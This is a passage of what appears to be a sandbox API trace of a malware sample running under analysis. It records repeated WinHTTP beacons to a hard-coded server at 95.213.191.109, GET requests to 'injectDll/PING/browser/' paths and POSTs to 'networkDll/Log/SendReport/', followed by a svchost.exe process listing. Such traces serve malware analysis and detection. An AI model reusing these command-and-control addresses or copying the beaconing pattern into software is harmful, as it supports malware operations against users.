	[0246.825] WinHttpQueryHeaders (in: hRequest=0x27e8958, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x34ef224, lpdwBufferLength=0x34ef220, lpdwIndex=0x0 | out: lpBuffer=0x34ef224*, lpdwBufferLength=0x34ef220*=0x4, lpdwIndex=0x0) returned 1
	[0246.825] Sleep (dwMilliseconds=0xbb8) 
	[0250.296] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27789d8) returned 1
	[0250.296] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1570) returned 1
	[0250.296] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27787f8) returned 1
	[0250.296] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778848) returned 1
	[0250.296] WinHttpCloseHandle (hInternet=0x27e8958) returned 1
	[0250.296] WinHttpCloseHandle (hInternet=0x22c5b58) returned 1
	[0250.296] WinHttpCloseHandle (hInternet=0x22c6808) returned 1
	[0250.296] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27784b0) returned 1

Thread:
	id = 361
	os_tid = 0xdd4

	[0246.497] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c56d0
	[0246.497] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0246.497] WinHttpConnect (hSession=0x22c56d0, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c5fe0
	[0246.497] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0918
	[0246.497] WinHttpSetTimeouts (hInternet=0x22c56d0, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0246.497] WinHttpOpenRequest (hConnect=0x22c5fe0, pwszVerb="GET", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x27e8408
	[0246.498] WinHttpSetOption (hInternet=0x27e8408, dwOption=0x1f, lpBuffer=0x268f234, dwBufferLength=0x4) returned 1
	[0246.498] WinHttpSendRequest (hRequest=0x27e8408, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0246.835] WinHttpReceiveResponse (hRequest=0x27e8408, lpReserved=0x0) returned 1
	[0246.835] WinHttpQueryHeaders (in: hRequest=0x27e8408, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x268f224, lpdwBufferLength=0x268f220, lpdwIndex=0x0 | out: lpBuffer=0x268f224*, lpdwBufferLength=0x268f220*=0x4, lpdwIndex=0x0) returned 1
	[0246.835] Sleep (dwMilliseconds=0xbb8) 
	[0250.296] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0968) returned 1
	[0250.296] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff9f0) returned 1
	[0250.296] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0940) returned 1
	[0250.296] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0670) returned 1
	[0250.296] WinHttpCloseHandle (hInternet=0x27e8408) returned 1
	[0250.296] WinHttpCloseHandle (hInternet=0x22c5fe0) returned 1
	[0250.296] WinHttpCloseHandle (hInternet=0x22c56d0) returned 1
	[0250.296] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0918) returned 1

Thread:
	id = 362
	os_tid = 0xdd0

	[0247.043] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c5418
	[0247.043] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0247.043] WinHttpConnect (hSession=0x22c5418, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c5078
	[0247.044] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0508
	[0247.044] WinHttpSetTimeouts (hInternet=0x22c5418, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0247.044] WinHttpOpenRequest (hConnect=0x22c5078, pwszVerb="GET", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x27e8160
	[0247.044] WinHttpSetOption (hInternet=0x27e8160, dwOption=0x1f, lpBuffer=0x2d8f234, dwBufferLength=0x4) returned 1
	[0247.044] WinHttpSendRequest (hRequest=0x27e8160, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0247.303] WinHttpReceiveResponse (hRequest=0x27e8160, lpReserved=0x0) returned 1
	[0247.303] WinHttpQueryHeaders (in: hRequest=0x27e8160, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x2d8f224, lpdwBufferLength=0x2d8f220, lpdwIndex=0x0 | out: lpBuffer=0x2d8f224*, lpdwBufferLength=0x2d8f220*=0x4, lpdwIndex=0x0) returned 1
	[0247.303] Sleep (dwMilliseconds=0xbb8) 
	[0250.474] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bfdb0) returned 1
	[0250.474] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffd80) returned 1
	[0250.474] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bfe78) returned 1
	[0250.474] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bfe28) returned 1
	[0250.474] WinHttpCloseHandle (hInternet=0x27e8160) returned 1
	[0250.475] WinHttpCloseHandle (hInternet=0x22c5078) returned 1
	[0250.475] WinHttpCloseHandle (hInternet=0x22c5418) returned 1
	[0250.475] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0508) returned 1

Thread:
	id = 363
	os_tid = 0xe30

	[0247.567] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c5e10
	[0247.567] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0247.567] WinHttpConnect (hSession=0x22c5e10, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c5ef8
	[0247.567] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0170
	[0247.567] WinHttpSetTimeouts (hInternet=0x22c5e10, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0247.568] WinHttpOpenRequest (hConnect=0x22c5ef8, pwszVerb="GET", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x27e7eb8
	[0247.568] WinHttpSetOption (hInternet=0x27e7eb8, dwOption=0x1f, lpBuffer=0x35ef234, dwBufferLength=0x4) returned 1
	[0247.568] WinHttpSendRequest (hRequest=0x27e7eb8, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0248.057] WinHttpReceiveResponse (hRequest=0x27e7eb8, lpReserved=0x0) returned 1
	[0248.057] WinHttpQueryHeaders (in: hRequest=0x27e7eb8, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x35ef224, lpdwBufferLength=0x35ef220, lpdwIndex=0x0 | out: lpBuffer=0x35ef224*, lpdwBufferLength=0x35ef220*=0x4, lpdwIndex=0x0) returned 1
	[0248.057] Sleep (dwMilliseconds=0xbb8) 
	[0251.223] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf9c8) returned 1
	[0251.223] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e14e0) returned 1
	[0251.223] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bfba8) returned 1
	[0251.223] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bfdd8) returned 1
	[0251.223] WinHttpCloseHandle (hInternet=0x27e7eb8) returned 1
	[0251.223] WinHttpCloseHandle (hInternet=0x22c5ef8) returned 1
	[0251.224] WinHttpCloseHandle (hInternet=0x22c5e10) returned 1
	[0251.224] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0170) returned 1

Thread:
	id = 364
	os_tid = 0xdb4

	[0248.152] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c6638
	[0248.152] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0248.152] WinHttpConnect (hSession=0x22c6638, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c6720
	[0248.152] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0300
	[0248.152] WinHttpSetTimeouts (hInternet=0x22c6638, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0248.152] WinHttpOpenRequest (hConnect=0x22c6720, pwszVerb="GET", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x27e76c0
	[0248.153] WinHttpSetOption (hInternet=0x27e76c0, dwOption=0x1f, lpBuffer=0x2edf234, dwBufferLength=0x4) returned 1
	[0248.153] WinHttpSendRequest (hRequest=0x27e76c0, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0248.797] WinHttpReceiveResponse (hRequest=0x27e76c0, lpReserved=0x0) returned 1
	[0248.797] WinHttpQueryHeaders (in: hRequest=0x27e76c0, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x2edf224, lpdwBufferLength=0x2edf220, lpdwIndex=0x0 | out: lpBuffer=0x2edf224*, lpdwBufferLength=0x2edf220*=0x4, lpdwIndex=0x0) returned 1
	[0248.797] Sleep (dwMilliseconds=0xbb8) 
	[0251.957] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c04e0) returned 1
	[0251.957] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e15a0) returned 1
	[0251.957] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c04b8) returned 1
	[0251.957] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0328) returned 1
	[0251.957] WinHttpCloseHandle (hInternet=0x27e76c0) returned 1
	[0251.957] WinHttpCloseHandle (hInternet=0x22c6720) returned 1
	[0251.957] WinHttpCloseHandle (hInternet=0x22c6638) returned 1
	[0251.957] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0300) returned 1

Thread:
	id = 377
	os_tid = 0xf50

	[0250.646] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c5078
	[0250.646] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0250.647] WinHttpConnect (hSession=0x22c5078, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c5418
	[0250.647] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4108
	[0250.647] WinHttpSetTimeouts (hInternet=0x22c5078, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0250.647] WinHttpOpenRequest (hConnect=0x22c5418, pwszVerb="GET", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x27e8160
	[0250.647] WinHttpSetOption (hInternet=0x27e8160, dwOption=0x1f, lpBuffer=0x268f234, dwBufferLength=0x4) returned 1
	[0250.647] WinHttpSendRequest (hRequest=0x27e8160, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0251.273] WinHttpReceiveResponse (hRequest=0x27e8160, lpReserved=0x0) returned 1
	[0251.274] WinHttpQueryHeaders (in: hRequest=0x27e8160, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x268f224, lpdwBufferLength=0x268f220, lpdwIndex=0x0 | out: lpBuffer=0x268f224*, lpdwBufferLength=0x268f220*=0x4, lpdwIndex=0x0) returned 1
	[0251.274] Sleep (dwMilliseconds=0xbb8) 
	[0254.281] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c40b8) returned 1
	[0254.281] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff8e8) returned 1
	[0254.281] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c2f10) returned 1
	[0254.281] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c4090) returned 1
	[0254.281] WinHttpCloseHandle (hInternet=0x27e8160) returned 1
	[0254.281] WinHttpCloseHandle (hInternet=0x22c5418) returned 1
	[0254.281] WinHttpCloseHandle (hInternet=0x22c5078) returned 1
	[0254.281] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c4108) returned 1

Thread:
	id = 378
	os_tid = 0xf60

	[0253.641] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c6638
	[0253.641] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0253.641] WinHttpConnect (hSession=0x22c6638, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c6720
	[0253.642] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0198
	[0253.642] WinHttpSetTimeouts (hInternet=0x22c6638, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0253.642] WinHttpOpenRequest (hConnect=0x22c6720, pwszVerb="GET", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x27e76c0
	[0253.642] WinHttpSetOption (hInternet=0x27e76c0, dwOption=0x1f, lpBuffer=0x2d8f234, dwBufferLength=0x4) returned 1
	[0253.642] WinHttpSendRequest (hRequest=0x27e76c0, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0254.433] WinHttpReceiveResponse (hRequest=0x27e76c0, lpReserved=0x0) returned 1
	[0254.433] WinHttpQueryHeaders (in: hRequest=0x27e76c0, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x2d8f224, lpdwBufferLength=0x2d8f220, lpdwIndex=0x0 | out: lpBuffer=0x2d8f224*, lpdwBufferLength=0x2d8f220*=0x4, lpdwIndex=0x0) returned 1
	[0254.433] Sleep (dwMilliseconds=0xbb8) 

Thread:
	id = 379
	os_tid = 0xf44

	[0253.677] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c5e10
	[0253.678] lstrcmpiW (lpString1="Log", lpString2="SINJ") returned -1
	[0253.678] WinHttpConnect (hSession=0x22c5e10, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c5ef8
	[0253.678] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c6818
	[0253.678] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="/1/", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4
	[0253.678] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe58
	[0253.678] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="/1/", cchWideChar=-1, lpMultiByteStr=0x22ffe58, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="/1/", lpUsedDefaultChar=0x0) returned 4
	[0253.678] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22fff00
	[0253.678] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e15b8
	[0253.678] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1528
	[0253.678] GetTickCount () returned 0xa95505
	[0253.678] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2807468
	[0253.678] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x70) returned 0x22c8368
	[0253.678] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x2edeb24, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5
	[0253.678] WinHttpSetTimeouts (hInternet=0x22c5e10, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=2700000, nReceiveTimeout=180000) returned 1
	[0253.678] WinHttpOpenRequest (hConnect=0x22c5ef8, pwszVerb="POST", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/networkDll/Log/SendReport/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x27e7eb8
	[0253.679] WinHttpSetOption (hInternet=0x27e7eb8, dwOption=0x1f, lpBuffer=0x2edf228, dwBufferLength=0x4) returned 1
	[0253.679] WinHttpSendRequest (hRequest=0x27e7eb8, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary01BBFD85\r\nContent-Length: 108\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x22c8368*, dwOptionalLength=0x6c, dwTotalLength=0x6c, dwContext=0x0) returned 1
	[0254.120] WinHttpReceiveResponse (hRequest=0x27e7eb8, lpReserved=0x0) returned 1
	[0254.120] WinHttpQueryHeaders (in: hRequest=0x27e7eb8, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x2edf218, lpdwBufferLength=0x2edf214, lpdwIndex=0x0 | out: lpBuffer=0x2edf218*, lpdwBufferLength=0x2edf214*=0x4, lpdwIndex=0x0) returned 1
	[0254.120] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22fff00) returned 1
	[0254.120] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e15b8) returned 1
	[0254.120] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1528) returned 1
	[0254.120] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe58) returned 1
	[0254.120] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2807468) returned 1
	[0254.120] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c8368) returned 1
	[0254.120] Sleep (dwMilliseconds=0xbb8) 

Thread:
	id = 380
	os_tid = 0xf54

	[0256.611] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c5418
	[0256.611] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0256.611] WinHttpConnect (hSession=0x22c5418, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c5078
	[0256.611] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c69a8
	[0256.611] WinHttpSetTimeouts (hInternet=0x22c5418, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0256.611] WinHttpOpenRequest (hConnect=0x22c5078, pwszVerb="GET", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x27e8160
	[0256.611] WinHttpSetOption (hInternet=0x27e8160, dwOption=0x1f, lpBuffer=0x268f234, dwBufferLength=0x4) returned 1
	[0256.611] WinHttpSendRequest (hRequest=0x27e8160, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) 

Thread:
	id = 381
	os_tid = 0xf58

	[0256.612] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c5fe0
	[0256.612] lstrcmpiW (lpString1="Log", lpString2="SINJ") returned -1
	[0256.612] WinHttpConnect (hSession=0x22c5fe0, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c56d0
	[0256.612] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c6b60
	[0256.612] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Report successfully sent", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25
	[0256.612] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c6b88
	[0256.612] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Report successfully sent", cchWideChar=-1, lpMultiByteStr=0x27c6b88, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Report successfully sent", lpUsedDefaultChar=0x0) returned 25
	[0256.612] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c6bb0
	[0256.612] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e14c8
	[0256.613] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1708
	[0256.613] GetTickCount () returned 0xa9607a
	[0256.613] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2807780
	[0256.613] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x90) returned 0x27738b0
	[0256.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x31eeb24, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5
	[0256.613] WinHttpSetTimeouts (hInternet=0x22c5fe0, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=2700000, nReceiveTimeout=180000) returned 1
	[0256.613] WinHttpOpenRequest (hConnect=0x22c56d0, pwszVerb="POST", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/networkDll/Log/SendReport/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x27e8408
	[0256.613] WinHttpSetOption (hInternet=0x27e8408, dwOption=0x1f, lpBuffer=0x31ef228, dwBufferLength=0x4) returned 1
	[0256.613] WinHttpSendRequest (hRequest=0x27e8408, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary01BC08FA\r\nContent-Length: 129\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x27738b0*, dwOptionalLength=0x81, dwTotalLength=0x81, dwContext=0x0) 

Process:
	id = "25"
	image_name = "svchost.exe"
	filename = "c:\\windows\\system32\\svchost.exe"
	page_root = "0x7ee171c0"
	os_pid = "0x34c"
	os_integrity_level = "0x4000"
	os_privileges = "0xe60b1e890"
	monitor_reason = "rpc_server"
	parent_id = "23"
	os_parent_pid = "0x914"
	cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "NT AUTHORITY\\SYSTEM"
	bitness = "64"
	os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000af54" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]


Thread:
	id = 84
	os_tid = 0xeb0


Thread:
	id = 85
	os_tid = 0x988


Thread:
	id = 86
	os_tid = 0x894


Thread:
	id = 87
	os_tid = 0x88c


Thread:
	id = 88
	os_tid = 0x888


Thread:
	id = 89
	os_tid = 0x884


Thread:
	id = 90
	os_tid = 0x830


Thread:
	id = 91
	os_tid = 0x82c


Thread:
	id = 92
	os_tid = 0x144


Thread:
	id = 93
	os_tid = 0x3a0


Thread:
	id = 94
	os_tid = 0x694


Thread:
	id = 95
	os_tid = 0x6f8


Thread:
	id = 96
	os_tid = 0x648


Thread:
	id = 97
	os_tid = 0x64c


Thread:
	id = 98
	os_tid = 0x638


Thread:
	id = 99
	os_tid = 0x14c


Thread:
	id = 100
	os_tid = 0x118


Thread:
	id = 101
	os_tid = 0x7cc


Thread:
	id = 102
	os_tid = 0x7c8


Thread:
	id = 103
	os_tid = 0x540


Thread:
	id = 104
	os_tid = 0x498


Thread:
	id = 105
	os_tid = 0x764


Thread:
	id = 106
	os_tid = 0x730


Thread:
	id = 107
	os_tid = 0x704


Thread:
	id = 108
	os_tid = 0x6b8


Thread:
	id = 109
	os_tid = 0x6b0


Thread:
	id = 110
	os_tid = 0x6a8


Thread:
	id = 111
	os_tid = 0x674


Thread:
	id = 112
	os_tid = 0x664


Thread:
	id = 113
	os_tid = 0x624


Thread:
	id = 114
	os_tid = 0x4f8


Thread:
	id = 115
	os_tid = 0x4ec


Thread:
	id = 116
